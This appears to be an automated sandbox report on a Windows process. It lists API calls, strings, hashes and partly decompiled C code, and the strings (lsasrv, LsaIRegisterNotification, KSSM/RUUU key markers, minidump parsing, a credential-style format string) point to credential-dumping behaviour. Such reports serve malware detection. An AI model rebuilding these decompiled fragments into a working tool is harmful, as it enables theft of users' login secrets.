0x7ff7cef255c2
0x7ff7cef255c5
0x7ff7cef255cd
0x7ff7cef255cf
0x7ff7cef255df
0x7ff7cef255ec
0x7ff7cef255f8
0x7ff7cef255ff
0x7ff7cef25604
0x7ff7cef2560d
0x7ff7cef2561b
0x7ff7cef25629
0x7ff7cef2562d
0x7ff7cef25631
0x7ff7cef25635
0x7ff7cef2563f
0x7ff7cef25652
0x7ff7cef25656
0x7ff7cef2565b
0x7ff7cef2565f
0x7ff7cef2568a

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7CEF255AD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7CEF255C5
RtlVirtualUnwind.KERNEL32 ref: 00007FF7CEF255FF
IsDebuggerPresent.KERNEL32 ref: 00007FF7CEF25635
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7CEF2563F
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7CEF2564A

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5d36ba9e913c190f0612814cc419d9f76b2a0e889312af5377098d70428b273c
Instruction ID: 68a194c857d61a31e66c7887317d4350ebb2d1f038c42c094d89026310328771
Opcode Fuzzy Hash: 5d36ba9e913c190f0612814cc419d9f76b2a0e889312af5377098d70428b273c
Instruction Fuzzy Hash: CB31B532608F8286DBA0DF25E8407AEB7A0FB84764F900135EA9D57B99DF3CD545CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF28834 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF28879
GetProcAddress.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF28895
EncodePointer.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF288A7
GetProcAddress.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF288BE
EncodePointer.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF288C7
GetProcAddress.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF288DE
EncodePointer.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF288E7
GetProcAddress.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF288FE
EncodePointer.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF28907
GetProcAddress.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF28926
EncodePointer.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF2892F
DecodePointer.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF28962
DecodePointer.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF28972
DecodePointer.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF289C8
DecodePointer.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF289E9
DecodePointer.KERNEL32(?,00007FF7CEF2365D), ref: 00007FF7CEF28A03

Strings

USER32.DLL, xrefs: 00007FF7CEF28872
GetActiveWindow, xrefs: 00007FF7CEF288AD
MessageBoxW, xrefs: 00007FF7CEF2888B
GetLastActivePopup, xrefs: 00007FF7CEF288CD
GetProcessWindowStation, xrefs: 00007FF7CEF2891C
GetUserObjectInformationW, xrefs: 00007FF7CEF288ED

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 2643518689-564504941
Opcode ID: 0c1cb570b7ca70ff1aa761079f1873bd645e17860191f496777693c89aa9f25e
Instruction ID: 2c3307249759f7c5c3f66e362cc3953d9e75b3d3a0231988dd727dfa6ce29fd2
Opcode Fuzzy Hash: 0c1cb570b7ca70ff1aa761079f1873bd645e17860191f496777693c89aa9f25e
Instruction Fuzzy Hash: 4C51E664A0AB4B81FED5FF61A854534A3A1AF89FB4F840535CC0E67764EF3CA4899321

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF22518 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 169libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF2256A
GetProcAddress.KERNEL32 ref: 00007FF7CEF2257A
RtlInitUnicodeString.NTDLL ref: 00007FF7CEF225EB
GetProcAddress.KERNEL32 ref: 00007FF7CEF2266A
GetProcAddress.KERNEL32 ref: 00007FF7CEF22687
GetModuleHandleW.KERNEL32 ref: 00007FF7CEF2277E
GetProcAddress.KERNEL32 ref: 00007FF7CEF2278E
GetModuleHandleW.KERNEL32 ref: 00007FF7CEF227B3
GetProcAddress.KERNEL32 ref: 00007FF7CEF227C3

Strings

LoadLibraryW, xrefs: 00007FF7CEF22570
LocalAlloc, xrefs: 00007FF7CEF22784, 00007FF7CEF227B9
kernel32, xrefs: 00007FF7CEF22563, 00007FF7CEF2276F, 00007FF7CEF2279F
LsaI, xrefs: 00007FF7CEF2263D
lsasrv, xrefs: 00007FF7CEF22580
LsaIRegisterNotification, xrefs: 00007FF7CEF22680
elNo, xrefs: 00007FF7CEF2264B
Canc, xrefs: 00007FF7CEF22644
tifi, xrefs: 00007FF7CEF22652
cati, xrefs: 00007FF7CEF22659

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$InitStringUnicode
String ID: Canc$LoadLibraryW$LocalAlloc$LsaI$LsaIRegisterNotification$cati$elNo$kernel32$lsasrv$tifi
API String ID: 3738668-3948219663
Opcode ID: 6f8f85ba962e89d97fe287bde9444a89b4325c89c55aa2fde47133f471363508
Instruction ID: 14d442da2d8fc0c3a2330f050174411eac0d7fee495d459cbe6085c0f162bf8d
Opcode Fuzzy Hash: 6f8f85ba962e89d97fe287bde9444a89b4325c89c55aa2fde47133f471363508
Instruction Fuzzy Hash: F0911F36B09B469AFB90EF64D8406AC73B5EB48768F814036CE0D67764DF38E549C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF23B74 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 149
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00007FF77FF7CEF23B74(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r8, void* _a8) {
				void* _v40;
				void* _v2088;
				long long _v2096;
				long long _v2104;
				void* _t79;
				intOrPtr _t80;
				intOrPtr* _t81;
				long long _t84;
				void* _t85;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				void* _t116;
				long long _t117;
				void* _t121;
				void* _t122;
				long long _t125;
				void* _t126;
				void* _t129;
				void* _t131;
				void* _t136;
				void* _t141;
				void* _t142;
				void* _t143;
				intOrPtr* _t144;
				void* _t146;
				intOrPtr* _t147;
				void* _t149;
				intOrPtr* _t150;
				long long _t152;

				_t125 = __rsi;
				_t84 = __rbx;
				_t79 = _t131;
				 *((long long*)(_t79 + 0x10)) = __rbx;
				 *((long long*)(_t79 + 0x18)) = __rbp;
				 *((long long*)(_t79 + 0x20)) = __rsi;
				r15d = 0;
				_t122 = __rcx;
				 *((intOrPtr*)(_t79 + 8)) = r15d;
				if ( *((intOrPtr*)(__rcx + 8)) != _t152) goto 0xcef23bbc;
				if ( *((intOrPtr*)(__rcx + 0x18)) != _t152) goto 0xcef23bbc;
				if ( *((intOrPtr*)(__rcx + 0x28)) == _t152) goto 0xcef23d86;
				_t112 =  *0xcef30688; // 0x0
				if (E00007FF77FF7CEF2224C(__rbx, __rcx, _t112, __rsi, _t152) == 0) goto 0xcef23bda;
				E00007FF77FF7CEF222F0(_t84, _t122, _t149);
				_t85 =  !=  ? _t122 : _t84;
				_t113 =  *0xcef30688; // 0x0
				_t142 = _t122 + 0x10;
				if (E00007FF77FF7CEF2224C(_t85, _t142, _t113, _t125, _t146) == 0) goto 0xcef23bff;
				E00007FF77FF7CEF222F0(_t85, _t142, _t141);
				_t126 =  !=  ? _t142 : _t125;
				_t114 =  *0xcef30688; // 0x0
				_t143 = _t122 + 0x20;
				if (E00007FF77FF7CEF2224C(_t85, _t143, _t114, _t126, _t121) == 0) goto 0xcef23d59;
				_t80 =  *0xcef30920; // 0x7ff7cef2c018
				_t12 = _t80 + 0x20; // 0x7ff7cef2f4c0
				_t81 =  *_t12;
				 *_t81();
				if (E00007FF77FF7CEF222F0(_t85, _t143) == 0) goto 0xcef23d59;
				_t129 = _t143;
				if (_t143 == 0) goto 0xcef23d59;
				E00007FF77FF7CEF23A80(_t81, _t85, _t85);
				_t147 = _t81;
				E00007FF77FF7CEF23A80(_t81, _t85, _t126);
				_t144 = _t81;
				E00007FF77FF7CEF23A80(_t81, _t85, _t129);
				_t150 = _t81;
				if (_t144 == 0) goto 0xcef23c8b;
				__imp__StrChrW();
				_t116 =  !=  ? _t152 : _t144;
				goto 0xcef23c8e;
				_t117 = _t152;
				if (_t117 == 0) goto 0xcef23ca6;
				if (_t147 != 0) goto 0xcef23ca9;
				_t99 =  !=  ? _t150 : 0xcef2c040;
				_t83 =  !=  ? _t147 : 0xcef2c040;
				_v2096 =  !=  ? _t150 : 0xcef2c040;
				_t136 =  !=  ? _t117 : 0xcef2c040;
				_v2104 = 0xcef2c040;
				wsprintfW(??, ??);
				asm("repne scasw");
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				r8d =  !( &_v2088 | 0xffffffff) +  !( &_v2088 | 0xffffffff);
				_v2104 = _t152;
				 *((long long*)( !=  ? _t147 : 0xcef2c040))();
				if (_t147 == 0) goto 0xcef23d3d;
				LocalFree(??);
				if (_t144 == 0) goto 0xcef23d4b;
				LocalFree(??);
				if (_t150 == 0) goto 0xcef23d59;
				LocalFree(??);
				if (_t85 == 0) goto 0xcef23d68;
				LocalFree(??);
				if (_t126 == 0) goto 0xcef23d77;
				LocalFree(??);
				if (_t129 == 0) goto 0xcef23d86;
				return LocalFree(??);
			}

0x7ff7cef23b74
0x7ff7cef23b74
0x7ff7cef23b74
0x7ff7cef23b77
0x7ff7cef23b7b
0x7ff7cef23b7f
0x7ff7cef23b93
0x7ff7cef23b96
0x7ff7cef23ba2
0x7ff7cef23baa
0x7ff7cef23bb0
0x7ff7cef23bb6
0x7ff7cef23bbc
0x7ff7cef23bca
0x7ff7cef23bcf
0x7ff7cef23bd6
0x7ff7cef23bda
0x7ff7cef23be1
0x7ff7cef23bef
0x7ff7cef23bf4
0x7ff7cef23bfb
0x7ff7cef23bff
0x7ff7cef23c06
0x7ff7cef23c14
0x7ff7cef23c1a
0x7ff7cef23c29
0x7ff7cef23c29
0x7ff7cef23c2d
0x7ff7cef23c39
0x7ff7cef23c3f
0x7ff7cef23c45
0x7ff7cef23c4e
0x7ff7cef23c56
0x7ff7cef23c59
0x7ff7cef23c61
0x7ff7cef23c64
0x7ff7cef23c69
0x7ff7cef23c6f
0x7ff7cef23c79
0x7ff7cef23c85
0x7ff7cef23c89
0x7ff7cef23c8b
0x7ff7cef23c98
0x7ff7cef23ca4
0x7ff7cef23cb2
0x7ff7cef23cb9
0x7ff7cef23cc0
0x7ff7cef23cc5
0x7ff7cef23cd5
0x7ff7cef23cda
0x7ff7cef23ceb
0x7ff7cef23cfb
0x7ff7cef23d0b
0x7ff7cef23d25
0x7ff7cef23d28
0x7ff7cef23d2d
0x7ff7cef23d32
0x7ff7cef23d37
0x7ff7cef23d40
0x7ff7cef23d45
0x7ff7cef23d4e
0x7ff7cef23d53
0x7ff7cef23d5c
0x7ff7cef23d62
0x7ff7cef23d6b
0x7ff7cef23d71
0x7ff7cef23d7a
0x7ff7cef23da6

APIs

StrChrW.SHLWAPI ref: 00007FF7CEF23C79
wsprintfW.USER32 ref: 00007FF7CEF23CDA
GetModuleHandleW.KERNEL32 ref: 00007FF7CEF23CFB
GetProcAddress.KERNEL32 ref: 00007FF7CEF23D0B
LocalFree.KERNEL32 ref: 00007FF7CEF23D37
LocalFree.KERNEL32 ref: 00007FF7CEF23D45
LocalFree.KERNEL32 ref: 00007FF7CEF23D53
LocalFree.KERNEL32 ref: 00007FF7CEF23D62
LocalFree.KERNEL32 ref: 00007FF7CEF23D71
LocalFree.KERNEL32 ref: 00007FF7CEF23D80

Strings

%lS%lS%lS:%lS, xrefs: 00007FF7CEF23CC9
kernel32, xrefs: 00007FF7CEF23CF4
WriteFile, xrefs: 00007FF7CEF23D01

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: FreeLocal$AddressHandleModuleProcwsprintf
String ID: %lS%lS%lS:%lS$WriteFile$kernel32
API String ID: 602150089-2677625405
Opcode ID: b11d8622920a2f47f9daaeab12ed3a5efb95e5e1c83adc421bcd68cf021e0860
Instruction ID: 3bd185a26294540baaf26314c89003de45e474ddbcbd095658e9b19d423db881
Opcode Fuzzy Hash: b11d8622920a2f47f9daaeab12ed3a5efb95e5e1c83adc421bcd68cf021e0860
Instruction Fuzzy Hash: 91517561709A4782EA98FF12A800676A3A0FF84FA4FD45135DD1E6B7A4DF3CE545C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF21000 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF21031
GetProcAddress.KERNEL32 ref: 00007FF7CEF21044
GetModuleHandleW.KERNEL32 ref: 00007FF7CEF21088
GetProcAddress.KERNEL32 ref: 00007FF7CEF21094
GetModuleHandleW.KERNEL32 ref: 00007FF7CEF210CE
GetProcAddress.KERNEL32 ref: 00007FF7CEF210DA
GetModuleHandleW.KERNEL32 ref: 00007FF7CEF2110F
GetProcAddress.KERNEL32 ref: 00007FF7CEF2111B
LocalFree.KERNEL32 ref: 00007FF7CEF21146

Strings

LocalAlloc, xrefs: 00007FF7CEF21037
kernel32, xrefs: 00007FF7CEF2101F

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc$FreeLocal
String ID: LocalAlloc$kernel32
API String ID: 3514375268-3502785670
Opcode ID: 16e864027eccf711ceb2599a8e25e6efffbb2f622ca0795a7aecc8477e6c70d0
Instruction ID: 58424369089563c33eaaf5de1acc3127a0fe4fc673582382998477ef75a40482
Opcode Fuzzy Hash: 16e864027eccf711ceb2599a8e25e6efffbb2f622ca0795a7aecc8477e6c70d0
Instruction Fuzzy Hash: 45414136A04B0285EA94EF56F844239A365FBC8FA4F958035CE4E2B354DF3DD849C314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF23074 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7CEF23074(void* __edx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, long long __r8, char _a8, long long _a16, long long _a24) {
				void* _v40;
				long long _v56;
				intOrPtr _v68;
				char _v72;
				long long _v80;
				void* _v88;
				intOrPtr _v104;
				intOrPtr _v112;
				long long _v120;
				long long _t86;
				long long _t89;
				void* _t116;
				intOrPtr* _t118;
				long long _t128;
				void* _t130;
				long long _t131;

				_t124 = __r8;
				_t89 = __rbx;
				_a16 = __rbx;
				_a24 = __rsi;
				_t131 = __r8;
				_t118 = __rcx;
				_v88 = __rcx;
				_v80 = 0xcef30618;
				_t6 = _t116 + 0x40; // 0x40
				r12d = _t6;
				if ( *((intOrPtr*)(__rdx + 8)) - 0x1f40 >= 0) goto 0xcef230ba;
				_t8 = _t116 + 0x18; // 0x18
				r13d = _t8;
				goto 0xcef230d7;
				if ( *((intOrPtr*)(__rdx + 8)) - 0x24b8 >= 0) goto 0xcef230ce;
				_t10 = _t89 - 8; // 0x28
				r13d = _t10;
				goto 0xcef230d7;
				_t90 = _t128;
				r13d = 0x38;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				 *0xcef30618();
				if (0xcef30618 == 0) goto 0xcef2324f;
				_t11 =  &_a8; // 0x68
				_t12 =  &_v88; // 0x8
				r8d = 4;
				_v88 = _t11;
				if (E00007FF77FF7CEF21170(_t128, _t12, __rcx, __r8) == 0) goto 0xcef23246;
				_t15 =  &_v88; // 0x8
				r8d = 8;
				_v88 = _t118;
				 *_t118 =  *_t118 + _a8 + 4;
				if (E00007FF77FF7CEF21170(_t128, _t15, _t118, _t124) == 0) goto 0xcef23246;
				_t17 =  &_v72; // 0x18
				_t18 =  &_v88; // 0x8
				r8d = 0x20;
				_v88 = _t17;
				if (E00007FF77FF7CEF21170(_t90, _t18, _t118, _t124) == 0) goto 0xcef23246;
				if (_v68 != 0x55555552) goto 0xcef23246;
				_t86 = _v56;
				_t22 =  &_v88; // 0x8
				_v88 = 0xcef30618;
				 *_t118 = _t86;
				if (E00007FF77FF7CEF21170(_t90, _t22, _t118, _t90) == 0) goto 0xcef23246;
				if ( *0x7FF7CEF3061C != 0x4d53534b) goto 0xcef23246;
				_t130 = r13d;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				 *_t86();
				_v88 = _t86;
				if (_t86 == 0) goto 0xcef23246;
				_t29 = _v56 + 4; // 0x2c
				 *_t118 = _t130 + _t29;
				r8d =  *((intOrPtr*)(_t130 + 0xcef30618));
				_t31 =  &_v88; // 0x8
				if (E00007FF77FF7CEF21170(_t90, _t31, _t118, _t90) == 0) goto 0xcef2323c;
				r9d =  *((intOrPtr*)(_t131 + 0x18));
				_v104 = 0;
				_v112 =  *((intOrPtr*)(_t130 + 0xcef30618));
				_v120 = _v88;
				dil =  *0xcef30660() > 0;
				LocalFree(??);
				LocalFree(??);
				return 0;
			}

0x7ff7cef23074
0x7ff7cef23074
0x7ff7cef23074
0x7ff7cef23079
0x7ff7cef2309d
0x7ff7cef230a0
0x7ff7cef230a3
0x7ff7cef230a7
0x7ff7cef230ab
0x7ff7cef230ab
0x7ff7cef230af
0x7ff7cef230b4
0x7ff7cef230b4
0x7ff7cef230b8
0x7ff7cef230c1
0x7ff7cef230c8
0x7ff7cef230c8
0x7ff7cef230cc
0x7ff7cef230ce
0x7ff7cef230d1
0x7ff7cef230de
0x7ff7cef230ee
0x7ff7cef230fa
0x7ff7cef23102
0x7ff7cef23108
0x7ff7cef2310c
0x7ff7cef23110
0x7ff7cef23119
0x7ff7cef23124
0x7ff7cef2312e
0x7ff7cef23132
0x7ff7cef2313f
0x7ff7cef23143
0x7ff7cef2314d
0x7ff7cef23153
0x7ff7cef23157
0x7ff7cef2315b
0x7ff7cef23164
0x7ff7cef2316f
0x7ff7cef2317c
0x7ff7cef23182
0x7ff7cef23186
0x7ff7cef23190
0x7ff7cef23194
0x7ff7cef2319e
0x7ff7cef231ad
0x7ff7cef231b3
0x7ff7cef231c2
0x7ff7cef231d2
0x7ff7cef231df
0x7ff7cef231e1
0x7ff7cef231e8
0x7ff7cef231f1
0x7ff7cef231f6
0x7ff7cef231f9
0x7ff7cef231fe
0x7ff7cef23209
0x7ff7cef23210
0x7ff7cef2321b
0x7ff7cef2321f
0x7ff7cef2322b
0x7ff7cef23238
0x7ff7cef23240
0x7ff7cef23249
0x7ff7cef23269

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF7CEF23032), ref: 00007FF7CEF230DE
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF7CEF23032), ref: 00007FF7CEF230EE
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF7CEF23032), ref: 00007FF7CEF231C2
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF7CEF23032), ref: 00007FF7CEF231D2
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF7CEF23032), ref: 00007FF7CEF23240
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF7CEF23032), ref: 00007FF7CEF23249

Strings

RUUU, xrefs: 00007FF7CEF23175
LocalAlloc, xrefs: 00007FF7CEF230E4, 00007FF7CEF231C8
kernel32, xrefs: 00007FF7CEF230D7, 00007FF7CEF231B6
KSSM, xrefs: 00007FF7CEF231A4

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLocalModuleProc
String ID: KSSM$LocalAlloc$RUUU$kernel32
API String ID: 1697219777-2069434485
Opcode ID: ae9309bfe1862c4b675f0d7e7819ae26e40bb70bf768e141a6c32085e0ba48a4
Instruction ID: ead62bb25d6d8d0e8ae223002fe5546db9e3a7c53729a8d6ea6d800fff1da1d3
Opcode Fuzzy Hash: ae9309bfe1862c4b675f0d7e7819ae26e40bb70bf768e141a6c32085e0ba48a4
Instruction Fuzzy Hash: E1518072B15B2386EB94EF61E8849ADB3A8FB44B98F814035DE0D63794EF38D545C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF21534 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66filelibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00007FF7CEF21108), ref: 00007FF7CEF21552
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF7CEF21108), ref: 00007FF7CEF21562
CreateFileMappingW.KERNEL32(?,?,?,?,?,00007FF7CEF21108), ref: 00007FF7CEF21591
MapViewOfFile.KERNEL32(?,?,?,?,?,00007FF7CEF21108), ref: 00007FF7CEF215B9
UnmapViewOfFile.KERNEL32(?,?,?,?,?,00007FF7CEF21108), ref: 00007FF7CEF215FB
CloseHandle.KERNEL32(?,?,?,?,?,00007FF7CEF21108), ref: 00007FF7CEF21609

Strings

LocalAlloc, xrefs: 00007FF7CEF21558
kernel32, xrefs: 00007FF7CEF21546
MDMP, xrefs: 00007FF7CEF215D5

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: File$HandleView$AddressCloseCreateMappingModuleProcUnmap
String ID: LocalAlloc$MDMP$kernel32
API String ID: 3734750734-1949004057
Opcode ID: ac78767d471d2eb992b9a504df308e303ca546f5a398330820821f7f68a337da
Instruction ID: 0a0830d050f1eff4ab948ede62f4dc357809f37b3c54e9276808aa6244be9ee9
Opcode Fuzzy Hash: ac78767d471d2eb992b9a504df308e303ca546f5a398330820821f7f68a337da
Instruction Fuzzy Hash: 6D218F37A08A0282EB90EF25E450229B3A1FBC8FA4B888131CA0D5BB14DF3CE455C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF26C90 Relevance: 12.2, APIs: 8, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CEF26FCD), ref: 00007FF7CEF26D2A
malloc.LIBCMT ref: 00007FF7CEF26D93
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CEF26FCD), ref: 00007FF7CEF26DC7
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CEF26FCD), ref: 00007FF7CEF26DEE
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CEF26FCD), ref: 00007FF7CEF26E36
malloc.LIBCMT ref: 00007FF7CEF26E93

Part of subcall function 00007FF7CEF28CD4: _FF_MSGBANNER.LIBCMT ref: 00007FF7CEF28D04
Part of subcall function 00007FF7CEF28CD4: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7CEF274D0,?,?,?,00007FF7CEF27395,?,?,?,00007FF7CEF2743F), ref: 00007FF7CEF28D29
Part of subcall function 00007FF7CEF28CD4: _callnewh.LIBCMT ref: 00007FF7CEF28D42
Part of subcall function 00007FF7CEF28CD4: _errno.LIBCMT ref: 00007FF7CEF28D4D
Part of subcall function 00007FF7CEF28CD4: _errno.LIBCMT ref: 00007FF7CEF28D58

LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CEF26FCD), ref: 00007FF7CEF26EC8
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CEF26FCD), ref: 00007FF7CEF26F08

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$_errnomalloc$AllocateHeap_callnewh
String ID:
API String ID: 1202131735-0
